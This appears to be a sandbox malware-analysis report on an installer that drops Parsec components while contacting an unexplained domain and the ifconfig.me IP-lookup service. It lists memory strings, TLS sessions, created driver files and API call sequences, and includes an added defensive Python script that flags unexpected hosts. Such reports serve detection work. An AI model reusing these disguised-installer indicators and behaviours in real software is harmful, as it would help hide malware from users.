Source: pservice.exe, 00000027.00000003.2531231225.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537010055.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537131193.000001F011AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0y
Source: pservice.exe, 00000027.00000003.2531612650.000001F0112B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl35
Source: pservice.exe, 00000027.00000003.2531231225.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537010055.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537131193.000001F011AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlZy
Source: pservice.exe, 00000027.00000003.2531231225.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537010055.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537131193.000001F011AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlxyI
Source: pservice.exe, 00000027.00000003.2531443435.000001F0112D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/l
Source: pservice.exe, 00000027.00000003.2537010055.000001F011AFA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531231225.000001F011AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com:80/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
Source: parsec-windows.exe, 0000000D.00000000.2203144262.000000000040A000.00000008.00000001.01000000.0000000A.sdmp, parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040A000.00000004.00000001.01000000.00000011.sdmp, parsec-vud.exe, 0000002D.00000000.2346150656.000000000040A000.00000008.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000000.2456937852.000000000040A000.00000008.00000001.01000000.00000017.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: pservice.exe, 00000027.00000002.3287466259.000001F011AEC000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531231225.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3138396186.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537010055.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2618126507.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2532225566.000001F011B08000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531045774.000001F011B05000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137536300.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537131193.000001F011AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com
Source: pservice.exe, 00000027.00000003.2531443435.000001F0112D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/
Source: pservice.exe, 00000027.00000003.3137674102.000001F0112D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rh
Source: pservice.exe, 00000027.00000002.3286410998.000001F01124A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxL
Source: parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F01129F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B40000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2617887892.000001F011B50000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137228223.000001F011B60000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F01129F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B40000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B0F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2617887892.000001F011B50000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286297733.000001F0111F5000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3138247513.000001F0112F6000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3138282207.000001F0112FD000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137228223.000001F011B60000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2618233200.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
Source: parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F01129F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B40000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B0F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B0F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2617887892.000001F011B50000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286297733.000001F0111F5000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287538963.000001F011AFA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137228223.000001F011B60000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2618233200.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F011270000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
Source: parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F01129F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B40000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B0F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2617887892.000001F011B50000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286297733.000001F0111F5000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137228223.000001F011B60000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2618233200.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
Source: pservice.exe, 00000027.00000003.3137674102.000001F0112D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRS
Source: pservice.exe, 00000027.00000002.3287320221.000001F011AC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com:80/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4
Source: pservice.exe, 00000027.00000003.2532225566.000001F011B08000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531045774.000001F011B05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comC
Source: pservice.exe, 00000027.00000003.3137674102.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
Source: pservice.exe, 00000027.00000002.3287357243.000001F011ACC000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3138509714.000001F011ACB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
Source: pservice.exe, 00000027.00000003.2531612650.000001F0112C2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F0112C2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F0112C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: pservice.exe, 00000027.00000003.2532225566.000001F011B08000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531045774.000001F011B05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comu
Source: parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F01129F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B40000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2617887892.000001F011B50000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137228223.000001F011B60000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmp | String found in binary or memory: http://www.digicert.com/CPS0
Source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.unicode.org/copyright.html
Source: uu8v4UUzTU.tmp, 00000002.00000002.2293815599.000000000374D000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000002.00000003.2286699133.0000000003720000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://beautifullyuncluttered.com/
Source: uu8v4UUzTU.tmp, 00000002.00000002.2293720265.0000000003710000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://beautifullyuncluttered.com/?CheckApp
Source: uu8v4UUzTU.tmp, 00000002.00000002.2293720265.0000000003710000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ifconfig.me/
Source: uu8v4UUzTU.tmp, 00000002.00000003.2288649107.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000002.00000003.2287035653.0000000000B0A000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000002.00000002.2293088361.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ifconfig.me/ip
Source: uu8v4UUzTU.tmp, 00000002.00000003.2288804175.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000002.00000002.2292586991.0000000000A9D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ifconfig.me/ip5.1ry
Source: uu8v4UUzTU.exe, is-LQSSJ.tmp.2.dr | String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: parsec-vdd.exe, 00000041.00000002.2492098487.00000000005D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://parsec.appURLUpdateInfohttps://parsec.app/changelog
Source: parsec-windows.exe, 0000000D.00000003.2494039079.0000000000675000.00000004.00000020.00020000.00000000.sdmp, parsec-windows.exe, 0000000D.00000002.2494938332.0000000000675000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://parsec.appURLUpdateInfohttps://parsec.app/changelogURL:parsec
Source: parsec-vud.exe, 0000002D.00000002.2450362899.0000000000518000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://parsec.appURLUpdateInfohttps://parsec.app/changelogkernel32::Wow64EnableWow64FsRedirection(i
Source: parsec-windows.exe, 0000000D.00000003.2494039079.0000000000675000.00000004.00000020.00020000.00000000.sdmp, parsec-windows.exe, 0000000D.00000002.2494938332.0000000000675000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2450362899.0000000000518000.00000004.00000020.00020000.00000000.sdmp, parsec-vdd.exe, 00000041.00000002.2492098487.00000000005D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.parsec.appInstallLocationNoModifyNoRepairPublisherParsec
Source: uu8v4UUzTU.exe, 00000000.00000003.2029697537.000000007FB30000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.exe, 00000000.00000003.2029324917.0000000002510000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000002.00000000.2031188431.0000000000401000.00000020.00000001.01000000.00000004.sdmp | String found in binary or memory: https://www.innosetup.com/
Source: uu8v4UUzTU.exe, 00000000.00000003.2029697537.000000007FB30000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.exe, 00000000.00000003.2029324917.0000000002510000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000002.00000000.2031188431.0000000000401000.00000020.00000001.01000000.00000004.sdmp | String found in binary or memory: https://www.remobjects.com/ps
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | HTTPS traffic detected: 34.160.111.145:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
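The string rows above are raw memory carves: the sandbox prints whatever bytes follow a URL, so `http://ocsp.digicert.com0A` and `http://ocsp.digicert.comhttp://crl3.digicert.com/...` are one OCSP URL with its neighbours attached, not separate indicators. The script below is an added triage example, not Joe Sandbox output and not Parsec code: it rebuilds the host names from those cells, labels the ones a DigiCert-signed, Inno Setup-packaged Parsec build is expected to reference, and leaves whatever remains (here beautifullyuncluttered.com and the public-IP echo service ifconfig.me) for the analyst. The public-suffix list, the EXPECTED table and the sample cells are this example's own assumptions, built from the rows above; the report does not say which of the two TLS peers served which host, so the session parser only pairs client ports with server IPs.

```python
"""Network-indicator triage for the rows above (added example, not Joe Sandbox output)."""
from __future__ import annotations

import re

# Constructed input: detail cells copied verbatim from the rows above.
REPORT_STRINGS = [
    "http://ocsp.digicert.com0",
    "http://ocsp.digicert.com0A",
    "http://ocsp.digicert.comC",
    "http://ocsp.digicert.comu",
    "http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRS",
    "http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertAssuredIDRootCA.crl",
    "http://www.digicert.com/CPS0",
    "http://www.unicode.org/copyright.html",
    "https://beautifullyuncluttered.com/?CheckApp",
    "https://ifconfig.me/ip5.1ry",
    "https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU",
    "https://parsec.appURLUpdateInfohttps://parsec.app/changelogURL:parsec",
    "https://support.parsec.appInstallLocationNoModifyNoRepairPublisherParsec",
    "https://www.innosetup.com/",
    "https://www.remobjects.com/ps",
]
TLS_ROWS = [
    "34.160.111.145:443 -> 192.168.2.5:49707 version: TLS 1.2",
    "188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2",
]

# The sandbox prints whatever bytes follow a URL in memory, so a host may carry
# a DER length byte ("0", "0A"), an OID, or the next string glued on.  A host is
# cut at the first label that is a public suffix once trailing digits are
# dropped.  Assumption: this short list is enough for this sample; extend it.
PUBLIC_SUFFIXES = ("com", "net", "org", "app", "me")

# Domains an Inno Setup-packaged, DigiCert-signed Parsec build is expected to
# mention.  Assumption: this table is this example's own, not the vendor's.
EXPECTED = {
    "digicert.com": "code-signing certificate chain (OCSP/CRL/AIA URLs)",
    "parsec.app": "Parsec vendor site",
    "innosetup.com": "Inno Setup",
    "jrsoftware.org": "Inno Setup",
    "remobjects.com": "Inno Setup's Pascal script engine",
    "unicode.org": "ICU/Unicode copyright string",
}

_URL_START = re.compile(r"(?=https?://)")
_HOST = re.compile(r"^https?://([a-z0-9.-]+)")  # case-sensitive: an uppercase byte ends the host
_TLS = re.compile(r"^(\S+):(\d+) -> (\S+):(\d+) version: (.+)$")


def _suffix(label: str, is_last: bool) -> str | None:
    """Public suffix hidden in a label ("com0" -> "com", final label "comu" -> "com"), else None."""
    core = label.rstrip("0123456789")
    if core in PUBLIC_SUFFIXES:
        return core
    if is_last:  # garbage glued to the final label with no digit boundary
        for s in sorted(PUBLIC_SUFFIXES, key=len, reverse=True):
            if core.startswith(s):
                return s
    return None


def extract_hosts(cell: str) -> list[str]:
    """Normalised host names in one cell; a cell can hold several URLs run together."""
    hosts = []
    for piece in _URL_START.split(cell):
        m = _HOST.match(piece)
        if not m:
            continue
        labels = m.group(1).strip(".").split(".")
        for i, label in enumerate(labels):
            suffix = _suffix(label, i == len(labels) - 1)
            if suffix:
                hosts.append(".".join(labels[:i] + [suffix]))
                break
        else:  # no recognised suffix: keep the raw host so a human looks at it
            hosts.append(".".join(labels))
    return hosts


def classify(cells: list[str]) -> dict[str, str]:
    """host -> why it is expected, or 'UNEXPLAINED' for anything outside EXPECTED."""
    result: dict[str, str] = {}
    for cell in cells:
        for host in extract_hosts(cell):
            registrable = ".".join(host.split(".")[-2:])
            result.setdefault(host, EXPECTED.get(registrable, "UNEXPLAINED"))
    return result


def unexplained_hosts(cells: list[str]) -> list[str]:
    return sorted(h for h, why in classify(cells).items() if why == "UNEXPLAINED")


def parse_tls(row: str) -> dict:
    """One 'HTTPS traffic detected' row -> endpoints and TLS version."""
    server, sport, client, cport, version = _TLS.match(row).groups()
    return {"server": server, "server_port": int(sport),
            "client": client, "client_port": int(cport), "version": version}


def sessions(rows: list[str]) -> dict[int, str]:
    """client port -> server IP: the key that joins the 'port 4970x -> 443' rows to a peer."""
    return {s["client_port"]: s["server"] for s in map(parse_tls, rows)}


if __name__ == "__main__":
    for host, why in sorted(classify(REPORT_STRINGS).items()):
        print(f"{host:30} {why}")
    print(sessions(TLS_ROWS))
```

Run it as a script to print the host table. The two "HTTP traffic on port 4970x -> 443" rows are the same two sessions seen from the client side, so the only thing the report leaves open is which IP carried which name; a pcap export with the TLS SNI closes that gap.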
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Code function: 13_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
Source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: GetRawInputData
Source: C:\Windows\System32\drvinst.exe | File created: C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\parsecvusba.cat (copy)
Source: C:\Windows\System32\drvinst.exe | File created: C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\SET636D.tmp
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | File created: C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\SET700F.tmp
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | File created: C:\Users\user\AppData\Local\Temp\{99c328e9-049a-fe42-a35c-67fa3e25e77d}\SET8A7D.tmp
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DD342DC083F9240614EBCF70523A8426
Source: C:\Windows\System32\drvinst.exe | File created: C:\Windows\System32\DriverStore\Temp\{7106dfa1-62ec-4647-bfd5-42198dd8ac12}\parsecvirtualds.cat (copy)
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | File created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.cat
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe | File created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.cat
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | File created: C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\parsecvirtualds.cat (copy)
Source: C:\Windows\System32\drvinst.exe | File created: C:\Windows\System32\DriverStore\Temp\{7106dfa1-62ec-4647-bfd5-42198dd8ac12}\SET70CA.tmp
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | File created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.cat
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | File created: C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\SET612A.tmp
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | File created: C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\parsecvusba.cat (copy)
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | File created: C:\Users\user\AppData\Local\Temp\{99c328e9-049a-fe42-a35c-67fa3e25e77d}\mm.cat (copy)
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB

System Summary

Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00F7A720: free,GetFileInformationByHandle,DeviceIoControl,free,free,memmove,free
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C3144C0 OpenSCManagerA,OpenServiceA,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle
Source: C:\Program Files\Parsec\pservice.exe | Code function: 39_2_00007FF7CD031850 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,ProcessIdToSessionId,Process32NextW,CloseHandle,OpenProcess,OpenProcessToken,DuplicateTokenEx,CloseHandle,CloseHandle,CloseHandle,SetTokenInformation,CreateProcessAsUserW,CloseHandle,CloseHandle
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Code function: 13_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,CoUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Code function: 45_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,CoUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
